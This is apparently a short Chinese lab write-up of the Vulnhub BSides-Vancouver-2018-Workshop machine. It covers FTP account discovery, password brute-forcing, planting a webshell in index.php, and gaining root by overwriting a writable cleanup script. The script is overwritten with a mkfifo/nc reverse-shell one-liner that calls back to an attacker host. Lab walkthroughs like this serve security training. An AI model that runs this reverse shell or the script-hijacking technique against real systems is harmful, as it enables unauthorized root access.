Vulnhub靶机第十二关

tech2023-01-14  119

Vulnhub靶机 BSides-Vancouver-2018-Workshop 靶机说明 靶机用ValualBox创建,目标是在其上获得root级访问。 目标 Boot to root:获得root权限和Flag。 运行环境 靶机:通过ValualBox打开虚拟机,网络连接方式设置为主机模式(host-only),或者将虚拟机、Kali机都桥 接到物理机的无线网卡。测试中使用VMWare导入虚机会无法获得IP,使用ValualBox可正常获得IP。 攻击机:同网段下有Windows攻击机(物理机),安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、 Hydra、Python2.7、DirBuster、AWVS、Nessus等渗透工具。同样可使用Kali Linux作为攻击机,预装了全 面的渗透工具。 老规矩nmap 扫描ip和获取详细信息 发现21端口开着 访问一下 ftp:192.168.56.102 发现五个账户 爆破密码成功 接着爆破后台密码 登录成功 开启nc监听 在index.php页面写入大马 访问index.php 成功获取shell 反弹交互式shell: python -c ‘import pty; pty.spawn("/bin/bash")’ 尝试ssh连接 切换到root用户 查看flag 将获得的shell 提升至root 权限 访问/usr/local/bin/cleanup 发现权限很高,可以执行读写 发现一段清理Apache日志的脚本 利用他反弹shell获取root权限,修改其内容为 写入echo ‘#!/bin/sh’ >cleanup 写入echo ‘rm /tmp/d;mkfifo /tmp/d;cat /tmp/d|/bin/sh -i 2>&1|nc 192.168.56.1 1234 > /tmp/d’ >>cleanup 开启nc 再次访问 cat cleanup 成功获得root权限

最新回复(0)